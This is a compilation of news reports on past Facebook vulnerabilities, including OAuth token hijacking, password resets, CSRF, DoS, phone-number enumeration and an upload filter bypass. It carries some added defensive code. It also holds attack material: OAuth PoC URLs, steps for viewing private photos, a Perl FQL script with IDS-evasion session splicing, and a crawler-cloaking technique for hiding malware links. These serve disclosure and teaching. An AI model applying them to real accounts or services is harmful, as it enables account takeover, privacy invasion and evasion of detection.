Another OAuth vulnerability allowed hijacking of Facebook accounts

Just a few weeks ago Nir Goldshlager disclosed an OAuth vulnerability in Facebook. Security researcher Amine Cherrai has also found a similar vulnerability in Facebook that allowed attackers to obtain the access_token, with full permissions, of any Facebook account.

"As you may know, last month Facebook closed many bugs, leading to security reinforcement of the 'redirect_uri' parameter to prevent hijacking attacks. One of these reinforcements was rejecting all 'redirect_uri' values that have '#' or '#!'," the researcher wrote in his blog.

"While I was looking in the Facebook Javascript SDK I found something strange, I found that it uses 'http://static.ak.facebook.com/connect/xd_arbiter.php?version=21#channel=f876ddf24&origin=http://localhost&channel_path=/oauth/PoC_js/?fb_xd_fragment#xd_sig=f3adf0e04c&' as a redirect_uri and it's not rejected... So I said let's use it too!!!"

Amine successfully produced a PoC that redirects to another Facebook page with the access token, but he ran into a problem when redirecting to an external website.

Nir Goldshlager helped Amine by suggesting that he redirect to a Facebook application, which then redirects to an external website, instead of redirecting directly to an external website. After following Nir Goldshlager's instructions, he successfully managed to generate a final redirect_uri.
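As an added example (not code from the researcher's post), the following redirect_uri validator contrasts a character blacklist of the kind described above with exact matching against registered URIs. The registered URI app.example.com is a constructed value, and the validator does not model the SDK exemption that let the xd_arbiter URL through; it only shows that a fragment-bearing, unregistered value is rejected by exact matching while a '#' blacklist still lets unregistered hosts pass.

```python
from urllib.parse import urlsplit

# Constructed: the redirect URIs a hypothetical app registered with the provider.
REGISTERED_REDIRECT_URIS = {"https://app.example.com/oauth/callback"}

# The xd_arbiter value quoted in the article, used here as a test input.
XD_ARBITER_URI = ("http://static.ak.facebook.com/connect/xd_arbiter.php?version=21"
                  "#channel=f876ddf24&origin=http://localhost"
                  "&channel_path=/oauth/PoC_js/?fb_xd_fragment#xd_sig=f3adf0e04c&")


def blacklist_check(redirect_uri):
    """The kind of character blacklist the article describes: reject '#' and '#!'.
    Anything without a '#' passes, including hosts the app never registered."""
    return "#" not in redirect_uri


def canonical(redirect_uri):
    """Normalise a redirect_uri to https://host[:port]path[?query], or return None
    when it has a property a legitimate redirect target never needs."""
    try:
        p = urlsplit(redirect_uri)
        port = p.port            # raises ValueError on a malformed port
    except ValueError:
        return None
    # A fragment never reaches the server (it is what the SDK URL above carries);
    # userinfo ("registered.host@evil.host") disguises the real host.
    if p.fragment or p.username or p.password:
        return None
    if p.scheme != "https" or not p.hostname:
        return None
    out = "https://" + p.hostname.lower()
    if port and port != 443:
        out += ":%d" % port
    out += p.path or "/"
    if p.query:
        out += "?" + p.query
    return out


def allowlist_check(redirect_uri, registered=REGISTERED_REDIRECT_URIS):
    """Exact match against the registered URIs after normalisation. No prefix or
    substring matching, so host-suffix and path-traversal variants fail."""
    c = canonical(redirect_uri)
    return c is not None and c in registered
```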


PoC video (embedded in the original post)

Facebook has learnt from its previous lessons and is now fixing vulnerabilities as soon as somebody reports them; this vulnerability has already been fixed.

How a Researcher Hacked Facebook OAuth To Get Full Permissions On Any Facebook Account


Security researcher Nir Goldshlager has discovered a security flaw in Facebook that allowed him to take full control of any Facebook account.

OAuth is used by Facebook to communicate between applications and Facebook users. Usually users must allow/accept the application's request to access their account before the communication can start. A Facebook application might ask for different permissions.

According to the researcher, the vulnerability gives full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos, etc.) over the victim's account.

"To make a successful attack, the victim needs to use a Facebook application (Texas Holdem Poker, Diamond Dash, etc..). And these applications only have basic permissions. We can always change the scope of the application permission and set a new permission, but this method is not powerful, because the victim needs to accept the new permissions of the app," the researcher said in his blog.

But the researcher discovered that there are built-in applications (Facebook Messenger) in Facebook that users never need to accept, and this application has full control over your account.

PoC:

https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token


Demo (embedded in the original post)

Password Reset Vulnerability in Facebook allowed hackers to hijack accounts


An independent security researcher, Sow Ching Shiong, has discovered a serious password reset vulnerability in Facebook that allowed attackers to change the passwords of Facebook accounts.

Normally, a user is required to enter the current password before setting a new one, to prevent an unauthorized person from changing the password without the user's knowledge.


However, the researcher identified that an attacker could change a user's password without knowing the user's current password by accessing the URL "https://www.facebook.com/hacked", which automatically redirected to the compromised-account recovery page.


On this page, an attacker was simply prompted to enter the new password and confirm it, without having to know any other information.

Facebook's security team fixed the vulnerability after being notified by the researcher, and Sow Ching Shiong has been added to Facebook's white hats list (https://www.facebook.com/whitehat).

Nir Goldshlager found vulnerability in Facebook Employees Secure Files Transfer service

Web application pentester Nir Goldshlager has identified a security flaw in Facebook's Employee Secure File Transfer service that allowed him to reset the password of accounts.

The secure file transfer service provider Accellion provides the service Facebook employees use for transferring files. Accellion had removed the registration page to prevent unauthorized users from creating accounts.

However, the researcher discovered that the registration page could still be accessed by anyone who knew the exact direct location of the registration form.

After he created an account, he started to analyze the service for security flaws and managed to find a critical vulnerability. There is an HTML file, "wmPassupdate.html", which is used for password recovery in Accellion Secure File Transfer.

Facebook Security Flaw

He identified that a referrer parameter is stored, base64-encoded, in a cookie. By changing the value of this parameter, he could change the password of any account.

Facebook and Accellion fixed the issue after being notified by the researcher. He also claimed to have reported 20+ different bugs in the Accellion Secure File Transfer service, all of which were fixed.

The PoC for the vulnerability (embedded in the original post):


Facebook vulnerability allowed hackers to record video of users and post it on their wall


A Cross-Site Request Forgery (CSRF) vulnerability in Facebook allowed attackers to record video of target users and post it on the victim's wall. The vulnerability was discovered by security researchers Aditya Gupta and Subho Halder from the XYSEC Team.

A malicious hacker could trick a user into silently recording his webcam video and publishing it to his Facebook wall, without the user even knowing about it.

In a YouTube video, the researchers demonstrate how an attacker could exploit this vulnerability.

Four months after the researchers notified Facebook about the security flaw, Facebook finally emailed them that their finding is eligible for a bug bounty of $2500, which will come as a Facebook WhiteHat Debit Card.

PoC (embedded in the original post):

Facebook Hack: vulnerability allows attacker to launch DoS attack against any user


Chris C. Russo, a security expert, has discovered a critical vulnerability in the Facebook Chat module that allows an attacker to launch a Denial of Service (DoS) attack against any Facebook user.

He discovered a security flaw in 'www.facebook.com/ajax/mercury/send_messages.php', specifically in the parameter 'message_batch[0][body]', which has no limit on the number of characters that can be sent.

So it is possible for attackers to send a long message that results in a DoS condition for the remote user. Since Facebook allows sending messages to almost every user, the attack can be launched against any user.

The researcher tested the flaw with three different test users. One of the users, who uses a tablet, said his tablet restarted and he was no longer able to access the Facebook app, since the chat log would remain there and make the app crash again.

"In order to prevent this, the length of that parameter should be analyzed *before* sending the information to the addressee user by the asynchronous connection," the researcher said.

"Personally I believe that there must be something wrong with XSRF tokens as well, because it would allow me to send several packets using the same token that I initially extracted, however I couldn't this information due to the ban prevention mechanism."

The researcher notified Facebook six weeks earlier, but the Facebook team replied that there was no flaw, so he published the details on seclists.

In the past, he discovered a security flaw in MSN Messenger that allowed an attacker to send a huge number of large packets, causing a denial of service.

Security flaw in Facebook exposes user phone numbers

Suriya Prakash, an Indian security researcher, has discovered a serious flaw in Facebook that allows scammers to get the phone numbers of millions of Facebook users.

If you are one of those people who proudly say "I have made my number private, so I am safe", then you must read this news before shouting.

Usually, most users change the privacy settings in the "Contact info" section in order to hide their mobile numbers from others, but they fail to realize that there is another option that exposes their numbers.

In the "How You Connect" section , there is an option for "Who can look you up using the email address or phone number you provided?". By default, it is set to "Everyone".


This allows people to find a Facebook profile by entering a phone number. Legitimate users will use this feature to find their friends on Facebook, but cybercriminals can exploit this feature to get the phone number and corresponding username.

According to the researcher, a simple brute-force script can exploit this feature and save phone numbers along with usernames, but "Rate limiting on finding users" can prevent this brute-force attack.

Unfortunately, the mobile version of Facebook fails to do that. To demonstrate the bug, he ran the script and extracted a number of phone numbers with usernames. He also published some of the extracted information.

He claimed that a large botnet with a better script could get the full list of usernames and phone numbers.

The expert says that he has reached out to Facebook more than five times and provided them with all the details of the exploit in an attempt to get the flaw fixed, but since they haven't acknowledged the existence of the bug he decided to make everything public.

"So to protect yourself against this, change your settings to 'My friends' and ask Facebook to provide an 'Only me' option and make it such that it is the default setting for all users!" the researcher concluded in his post.

Vulnerability in Facebook app for Android & iOS leads to Identity theft


A new security vulnerability in Facebook application for Android and iOS allows an attacker to steal your Facebook identity.

Gareth Wright, a UK-based app developer for Android and iOS, has identified a security vulnerability in the Facebook mobile application. The problem is that the Facebook app doesn't encrypt your login credentials, leaving them accessible to other malicious apps or over USB connections.

He explained the hack in his blog post.

Facebook responded to this vulnerability disclosure by issuing the following statement:
"Facebook’s iOS and Android applications are only intended for use with the manufacturer provided operating system, and access tokens are only vulnerable if they have modified their mobile OS (i.e. jailbroken iOS or modded Android) or have granted a malicious actor access to the physical device.

"We develop and test our application on an unmodified version of mobile operating systems and rely on the native protections as a foundation for development, deployment and security, all of which is compromised on a jailbroken device."

This statement appears to claim that only jailbroken devices are affected; TheNextWeb (TNW) says this is untrue: "Your Facebook app on iOS is absolutely vulnerable because using a tool like iExplore, which is what Wright used to perform his white label hack, does not require a jailbreak."

Researchers also discovered that popular file-syncing app Dropbox also exhibits the vulnerability.

Tracing people by photos on Facebook

Security researcher 'Rjcrystal Decoder' has found a way to find someone's profile ID using the link to an image file. He explained how to do this in his own blog post.

This trick helps find the person who uploaded an image file to Facebook, given the URL of the image. For example:


www.some.fcbdn.akamahid.net/216512_204732556226334_100000687732419_582854_6270883_n.jpg

Here the third underscore-separated number (100000687732419) is the profile ID of the user who uploaded the image. It may look like a simple sequence of numbers, but we can get information about the user by using the Facebook Graph API:

http://graph.facebook.com/?id=Profile_ID

In our example:

http://graph.facebook.com/?id=100000687732419

Or you can go directly to the user profile by entering the profile ID at the end of this URL:

www.facebook.com/profile.php?id=

In our example:

www.facebook.com/profile.php?id=100000687732419

Facebook "Deactivated Friend Attack" allows attackers to spy on users

University College London research student Shah Mahmood and Chair of Information Communication Technology Yvo Desmedt have uncovered a "zero-day privacy loophole" in Facebook that allows cybercriminals to spy on users.

The Register reports that "Deactivated Friend Attack", was announced at the IEEE International workshop on Security and Social Networking SESOC 2012, held at Lugano, Switzerland on March 19th.

In the 'Deactivated Friend attack', the attacker tricks a user into accepting him as a friend. Once he has become a friend of the victim, he can deactivate his own account so that the victim cannot unfriend him. Facebook accounts can be deactivated and reactivated indefinitely, and Facebook doesn't notify users when a friend has activated or deactivated their account.

Each time the attacker reactivates his account, he can access the information posted by the victim. The victim would never know of that information-gathering effort, unless they happened to be paying attention to the temporarily uncloaked account.

"Various groups of information aggregators including marketers, background checking agencies, governments, hackers, spammers, stalkers and criminals would find this attractive as a permanent back door to the private information of a Facebook user," the researchers said.

Researchers demonstrated the attack by making over 4300 Facebook friends and maintaining access to their Facebook profile information for a period of 261 days.

"No user was able to unfriend us during this time due to cloaking and short de-cloaking sessions. The short de-cloaking sessions were enough to get updates about the victims," the researchers said. "We also provide several solutions for the loophole, which range from mitigation to a permanent solution."

How to access private photos using a Facebook vulnerability: Patched

A vulnerability in the Facebook social network allows attackers to steal the private photos of users. The method was posted on a bodybuilding forum.

The steps:
  1. Locate the person whose photos you want to view.
  2. Click on Report/Block. From the popup menu, select Inappropriate Profile Photo and press Continue.
  3. Select Nudity or Pornography and press Continue.
  4. Only check Report to Facebook and press Continue.
  5. Only select "Help us take action by selecting additional photos to include with your report" and press Okay.

The forum member said this vulnerability has been patched by Facebook, but ZDNet says the bug is still there: they tried the trick and it worked on some profiles. Facebook is trying to fix this vulnerability.

Facebook issued this statement a short time ago:

“Earlier today, we discovered a bug in one of our reporting flows that allows people to report multiple instances of inappropriate content simultaneously.

The bug was a result of one of our most recent code pushes and was live for a limited period of time. Not all content was accessible, rather a small number of one’s photos. Upon discovering the bug, we immediately disabled the system, and will only return functionality once we can confirm the bug has been fixed.”

Latest Facebook security flaw allows EXE file attachments


Facebook offers file uploading in messages, and Facebook security does not allow users to upload executable files (.EXE files). Nathan Power, a security researcher from securitypentest, discovered a new vulnerability in Facebook's file uploading feature that allows uploading EXE files. To send a message, you don't need to be a friend.


Vulnerability Description:
Facebook displays an error message whenever a user tries to upload such a file. Whenever a file is uploaded, Facebook sends a POST request to the server, and the researcher looked at the parameters of that POST request:
Content-Disposition: form-data; name="attachment"; filename="cmd.exe"
Here you can see that the filename parameter carries the file name. This value is used to check whether the file type is allowed to be uploaded; if it is a .exe file, it will be rejected. The researcher appended white space to the end of the filename in order to bypass the check, and it worked for him.


Post Request Contents

He reported this vulnerability to Facebook and they have now fixed it.
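As an added example (not the researcher's code), the following contrasts a suffix check of the kind the article describes with a normalising allowlist check, run against a constructed Content-Disposition header in the shape shown above with the trailing space appended. The allowed extension list is a constructed assumption; the point is that the name is normalised (directories, trailing dots and whitespace removed) before the extension is compared.

```python
import re

# Constructed allowlist of upload types a messaging feature might accept.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Constructed header in the shape the article shows, with the trailing space appended.
SAMPLE_HEADER = 'form-data; name="attachment"; filename="cmd.exe "'

_FILENAME_RE = re.compile(r'filename="([^"]*)"')


def filename_from_disposition(header):
    """Return the raw filename parameter of a Content-Disposition value, or None."""
    m = _FILENAME_RE.search(header)
    return m.group(1) if m else None


def weak_is_allowed(filename):
    """The check the article describes: block names ending in ".exe".
    "cmd.exe " (trailing space) passes because the suffix no longer matches."""
    return not filename.lower().endswith(".exe")


def normalise_filename(filename):
    """Reduce a client-supplied name to a bare base name: drop directories,
    then trailing dots and whitespace, which Windows discards when creating the file."""
    name = filename.strip()
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rstrip(". ")


def hardened_is_allowed(filename, allowed=ALLOWED_EXTENSIONS):
    """Allowlist the extension of the normalised name; reject control characters,
    names without an extension, and anything not on the list."""
    name = normalise_filename(filename)
    if not name or any(ord(ch) < 32 for ch in name):
        return False
    if "." not in name:
        return False
    ext = name.rsplit(".", 1)[1].lower()
    return ext in allowed
```

An extension allowlist only decides what name the file is stored under; the content itself still needs to be sniffed and served with a safe Content-Type.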

Facebook, Google+ vulnerable to content restriction bypass


Facebook is currently vulnerable to bypassing content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about this, so BlackhatAcademy decided to release it publicly.

FQL
Simply requiring an API key for privileged queries does not protect Facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL does not allow the use of JOINs, but that is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious Facebook application or directly on the FQL development API page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing.


#!/usr/bin/perl
use strict;
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;

my %opts;
getopts('q:', \%opts);
# Query to run; falls back to the example query when -q is not given
# (the original "my $x = ... if ..." form leaves $x unset when the option is absent)
my $query = defined $opts{q} ? $opts{q} : "SELECT pic_big FROM user WHERE uid=6666666";
my $ref = fqlQuery($query);
die "No response from the FQL endpoint\n" unless defined $ref;

# Walk the parsed XML two levels deep and pretty-print it.
# ref() checks replace the original %{...} tests, which die on non-hash values.
foreach my $parent (sort keys %{$ref}) {
    if (ref $ref->{$parent} eq 'HASH') {
        print "$parent: \n";
        foreach my $key (sort keys %{$ref->{$parent}}) {
            if (ref $ref->{$parent}->{$key} eq 'HASH') {
                print "\t$key : \n";
                foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
                    print "\t\t$mojo : ", $ref->{$parent}->{$key}->{$mojo}, "\n";
                }
            } else {
                print "\t$key : ", $ref->{$parent}->{$key}, "\n";
            }
        }
    } else {
        print "$parent : " . $ref->{$parent} . "\n";
    }
}

# Send one FQL query and return the parsed XML, or undef on failure.
sub fqlQuery {
    my $q = shift;
    $q =~ s/ /%20/g;
    my $link = "http://api.facebook.com/method/fql.query?query=$q";
    my $text = download($link, "api.facebook.com");
    return undef unless defined $text;
    return XMLin($text);
}

# Fetch $uri from $host with LibWhisker2, retrying up to 5 times.
# The original passed $try where $host was expected and started $try at 5,
# so no retry ever happened; it also returned the body twice as a list.
sub download {
    my ($uri, $host, $try) = @_;
    $try = 1 unless defined $try;
    my (%request, %response);
    LW2::http_init_request(\%request);
    $request{'whisker'}->{'method'} = "GET";
    $request{'whisker'}->{'host'}   = $host;
    $request{'whisker'}->{'uri'}    = $uri;
    $request{'whisker'}->{'encode_anti_ids'} = 9;   # session splicing
    $request{'whisker'}->{'user-agent'} = "";
    LW2::http_fixup_request(\%request);
    if (LW2::http_do_request(\%request, \%response)) {
        if ($try < 5) {
            print "Failed to fetch $uri on try $try. Retrying...\n";
            return download($uri, $host, $try + 1);
        }
        print "Failed to fetch $uri.\n";
        return undef;
    }
    return $response{'whisker'}->{'data'};
}

Content Forgery
While most major sites that allow link submission are vulnerable to this method, sites including Websense, Google+, and Facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked to. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistent domain name. Facebook IP addresses resolve to tfbnw.net, and Facebook also sets a custom user agent of "facebookexternalhit". Google+ (also notified Jul. 31st, and guilty of the same lack of reasonable care) follows suit and uses "Feedfetcher-Google" as its user agent.

Knowing this, we can easily filter out requests coming from these websites, and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone that follows the links. Facebook's recent partnership with Websense is laughable, since Websense's "ACE" security scanner is just as easily identified, by using gethostbyaddr to resolve the IP back to websense.com. Using this technique would allow an overwhelming number of malware sites to remain undetected by their automatic site analysis.

Other places like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears our server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.
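As an added example (this is not BlackhatAcademy's code), a small detector for the Cross-Site Content Forgery class described above: it fetches the same link under a browser identity and under each preview-crawler user agent the article names, and reports any crawler identity that receives a different response. The fetch callable and both sample sites are constructed stand-ins so the check runs offline; a live check would pass a real HTTP client with the same signature.

```python
import hashlib
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    location: str   # redirect target, "" when there is none
    body: bytes


# Constructed browser identity; the crawler strings are the user agents the article names.
BROWSER_UA = "Mozilla/5.0 (constructed browser agent)"
CRAWLER_UAS = ["facebookexternalhit/1.1", "Feedfetcher-Google"]


def _cloaking_site(url, user_agent):
    """Constructed test double behaving like the site the article describes:
    preview crawlers get a harmless image, everyone else is redirected."""
    if any(ua.split("/")[0] in user_agent for ua in CRAWLER_UAS):
        return Response(200, "", b"\x89PNG constructed harmless image bytes")
    return Response(302, "http://elsewhere.example/landing", b"")


def _honest_site(url, user_agent):
    """Constructed test double that serves the same page to everybody."""
    return Response(200, "", b"<html>constructed page</html>")


def fingerprint(resp):
    """What is compared across identities: status, redirect target and body hash."""
    return (resp.status, resp.location, hashlib.sha256(resp.body).hexdigest())


def detect_cloaking(url, fetch, browser_ua=BROWSER_UA, crawler_uas=CRAWLER_UAS):
    """Fetch url as a browser and as each crawler identity; return the crawler
    identities whose response differs from the browser's (empty list = consistent).
    fetch(url, user_agent) -> Response is supplied by the caller."""
    baseline = fingerprint(fetch(url, browser_ua))
    return [ua for ua in crawler_uas if fingerprint(fetch(url, ua)) != baseline]
```

Sites that key on reverse DNS rather than the user agent, as the article says Websense's scanner can be, will only show up if the comparison requests also originate from differently resolving addresses.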

For more info follow this link:
http://www.blackhatacademy.org/security101/index.php?title=Facebook